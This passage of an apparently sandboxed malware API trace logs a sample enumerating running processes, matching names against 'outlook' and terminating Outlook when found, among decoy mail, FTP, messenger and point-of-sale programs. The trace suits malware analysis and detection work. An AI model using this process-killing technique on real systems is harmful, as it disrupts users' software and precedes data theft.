lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0098.657] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35785e8 [0098.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x35785e8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="flashfxp.exe", lpUsedDefaultChar=0x0) returned 13 [0098.657] lstrcpyA (in: lpString1=0x567fabc, lpString2="flashfxp.exe" | out: lpString1="flashfxp.exe") returned="flashfxp.exe" [0098.658] StrStrIA (lpFirst="flashfxp.exe", lpSrch="outlook") returned 0x0 [0098.658] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0098.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0098.660] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35783c0 [0098.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x35783c0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fling.exe", lpUsedDefaultChar=0x0) returned 10 [0098.660] lstrcpyA (in: lpString1=0x567fabc, lpString2="fling.exe" | out: lpString1="fling.exe") returned="fling.exe" [0098.660] StrStrIA (lpFirst="fling.exe", lpSrch="outlook") returned 0x0 [0098.660] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0098.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0098.661] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357a458 [0098.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x357a458, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="foxmailincmail.exe", lpUsedDefaultChar=0x0) returned 19 [0098.661] lstrcpyA (in: lpString1=0x567fabc, lpString2="foxmailincmail.exe" | out: lpString1="foxmailincmail.exe") returned="foxmailincmail.exe" [0098.661] StrStrIA (lpFirst="foxmailincmail.exe", lpSrch="outlook") returned 0x0 [0098.661] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0098.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0098.662] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357a318 [0098.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x357a318, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gmailnotifierpro.exe", lpUsedDefaultChar=0x0) returned 21 [0098.662] lstrcpyA (in: lpString1=0x567fabc, lpString2="gmailnotifierpro.exe" | out: lpString1="gmailnotifierpro.exe") returned="gmailnotifierpro.exe" [0098.662] StrStrIA (lpFirst="gmailnotifierpro.exe", lpSrch="outlook") returned 0x0 [0098.662] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0098.664] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0098.664] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3574fd0 [0098.664] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x3574fd0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icq.exe", lpUsedDefaultChar=0x0) returned 8 [0098.664] lstrcpyA (in: lpString1=0x567fabc, lpString2="icq.exe" | out: lpString1="icq.exe") returned="icq.exe" [0098.664] StrStrIA (lpFirst="icq.exe", lpSrch="outlook") returned 0x0 [0098.664] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0098.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0098.665] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35784e0 [0098.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x35784e0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="leechftp.exe", lpUsedDefaultChar=0x0) returned 13 [0098.665] lstrcpyA (in: lpString1=0x567fabc, lpString2="leechftp.exe" | out: lpString1="leechftp.exe") returned="leechftp.exe" [0098.665] StrStrIA (lpFirst="leechftp.exe", lpSrch="outlook") returned 0x0 [0098.665] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0098.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0098.666] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3578558 [0098.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x3578558, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ncftp.exe", lpUsedDefaultChar=0x0) returned 10 [0098.666] lstrcpyA (in: lpString1=0x567fabc, lpString2="ncftp.exe" | out: lpString1="ncftp.exe") returned="ncftp.exe" [0098.666] StrStrIA (lpFirst="ncftp.exe", lpSrch="outlook") returned 0x0 [0098.667] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0098.668] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.668] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35783d8 [0098.668] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x35783d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="notepad.exe", lpUsedDefaultChar=0x0) returned 12 [0098.668] lstrcpyA (in: lpString1=0x567fabc, lpString2="notepad.exe" | out: lpString1="notepad.exe") returned="notepad.exe" [0098.668] StrStrIA (lpFirst="notepad.exe", lpSrch="outlook") returned 0x0 [0098.668] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0098.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0098.669] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35783f0 [0098.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x35783f0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="operamail.exe", lpUsedDefaultChar=0x0) returned 14 [0098.669] lstrcpyA (in: lpString1=0x567fabc, lpString2="operamail.exe" | out: lpString1="operamail.exe") returned="operamail.exe" [0098.669] StrStrIA (lpFirst="operamail.exe", lpSrch="outlook") returned 0x0 [0098.669] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0098.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="outlook.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.670] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3578408 [0098.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="outlook.exe", cchWideChar=-1, lpMultiByteStr=0x3578408, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outlook.exe", lpUsedDefaultChar=0x0) returned 12 [0098.670] lstrcpyA (in: lpString1=0x567fabc, lpString2="outlook.exe" | out: lpString1="outlook.exe") returned="outlook.exe" [0098.670] StrStrIA (lpFirst="outlook.exe", lpSrch="outlook") returned="outlook.exe" [0098.670] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0xb9c) returned 0x354 [0098.671] TerminateProcess (hProcess=0x354, uExitCode=0x29a) returned 1 [0098.696] CloseHandle (hObject=0x354) returned 1 [0098.696] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0098.697] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0098.697] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3578720 [0098.697] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x3578720, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pidgin.exe", lpUsedDefaultChar=0x0) returned 11 [0098.698] lstrcpyA (in: lpString1=0x567fabc, lpString2="pidgin.exe" | out: lpString1="pidgin.exe") returned="pidgin.exe" [0098.698] StrStrIA (lpFirst="pidgin.exe", lpSrch="outlook") returned 0x0 [0098.698] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0098.699] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0098.699] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3578990 [0098.699] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x3578990, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="scriptftp.exe", lpUsedDefaultChar=0x0) returned 14 [0098.699] lstrcpyA (in: lpString1=0x567fabc, lpString2="scriptftp.exe" | out: lpString1="scriptftp.exe") returned="scriptftp.exe" [0098.699] StrStrIA (lpFirst="scriptftp.exe", lpSrch="outlook") returned 0x0 [0098.699] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0098.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0098.700] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3578738 [0098.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x3578738, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="skype.exe", lpUsedDefaultChar=0x0) returned 10 [0098.700] lstrcpyA (in: lpString1=0x567fabc, lpString2="skype.exe" | out: lpString1="skype.exe") returned="skype.exe" [0098.700] StrStrIA (lpFirst="skype.exe", lpSrch="outlook") returned 0x0 [0098.700] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0098.702] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0098.702] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35787e0 [0098.702] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x35787e0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smartftp.exe", lpUsedDefaultChar=0x0) returned 13 [0098.702] lstrcpyA (in: lpString1=0x567fabc, lpString2="smartftp.exe" | out: lpString1="smartftp.exe") returned="smartftp.exe" [0098.702] StrStrIA (lpFirst="smartftp.exe", lpSrch="outlook") returned 0x0 [0098.702] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0098.703] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0098.703] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3578918 [0098.703] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x3578918, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thunderbird.exe", lpUsedDefaultChar=0x0) returned 16 [0098.703] lstrcpyA (in: lpString1=0x567fabc, lpString2="thunderbird.exe" | out: lpString1="thunderbird.exe") returned="thunderbird.exe" [0098.703] StrStrIA (lpFirst="thunderbird.exe", lpSrch="outlook") returned 0x0 [0098.703] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0098.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0098.704] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3578750 [0098.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x3578750, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="totalcmd.exe", lpUsedDefaultChar=0x0) returned 13 [0098.704] lstrcpyA (in: lpString1=0x567fabc, lpString2="totalcmd.exe" | out: lpString1="totalcmd.exe") returned="totalcmd.exe" [0098.705] StrStrIA (lpFirst="totalcmd.exe", lpSrch="outlook") returned 0x0 [0098.705] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0098.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0098.706] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3578828 [0098.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x3578828, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="trillian.exe", lpUsedDefaultChar=0x0) returned 13 [0098.706] lstrcpyA (in: lpString1=0x567fabc, lpString2="trillian.exe" | out: lpString1="trillian.exe") returned="trillian.exe" [0098.706] StrStrIA (lpFirst="trillian.exe", lpSrch="outlook") returned 0x0 [0098.706] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0098.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0098.708] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3578930 [0098.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x3578930, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="webdrive.exe", lpUsedDefaultChar=0x0) returned 13 [0098.708] lstrcpyA (in: lpString1=0x567fabc, lpString2="webdrive.exe" | out: lpString1="webdrive.exe") returned="webdrive.exe" [0098.708] StrStrIA (lpFirst="webdrive.exe", lpSrch="outlook") returned 0x0 [0098.708] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0098.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0098.709] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3578978 [0098.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x3578978, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="whatsapp.exe", lpUsedDefaultChar=0x0) returned 13 [0098.709] lstrcpyA (in: lpString1=0x567fabc, lpString2="whatsapp.exe" | out: lpString1="whatsapp.exe") returned="whatsapp.exe" [0098.709] StrStrIA (lpFirst="whatsapp.exe", lpSrch="outlook") returned 0x0 [0098.709] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0098.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0098.710] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3578948 [0098.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x3578948, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winscp.exe", lpUsedDefaultChar=0x0) returned 11 [0098.710] lstrcpyA (in: lpString1=0x567fabc, lpString2="winscp.exe" | out: lpString1="winscp.exe") returned="winscp.exe" [0098.711] StrStrIA (lpFirst="winscp.exe", lpSrch="outlook") returned 0x0 [0098.711] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0098.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0098.712] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357a198 [0098.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x357a198, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="yahoomessenger.exe", lpUsedDefaultChar=0x0) returned 19 [0098.712] lstrcpyA (in: lpString1=0x567fabc, lpString2="yahoomessenger.exe" | out: lpString1="yahoomessenger.exe") returned="yahoomessenger.exe" [0098.712] StrStrIA (lpFirst="yahoomessenger.exe", lpSrch="outlook") returned 0x0 [0098.712] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0098.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0098.713] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x357a3b8 [0098.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x357a3b8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="active-charge.exe", lpUsedDefaultChar=0x0) returned 18 [0098.713] lstrcpyA (in: lpString1=0x567fabc, lpString2="active-charge.exe" | out: lpString1="active-charge.exe") returned="active-charge.exe" [0098.713] StrStrIA (lpFirst="active-charge.exe", lpSrch="outlook") returned 0x0 [0098.713] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0098.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.715] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35787b0 [0098.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x35787b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accupos.exe", lpUsedDefaultChar=0x0) returned 12 [0098.715] lstrcpyA (in: lpString1=0x567fabc, lpString2="accupos.exe" | out: lpString1="accupos.exe") returned="accupos.exe" [0098.715] StrStrIA (lpFirst="accupos.exe", lpSrch="outlook") returned 0x0 [0098.715] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 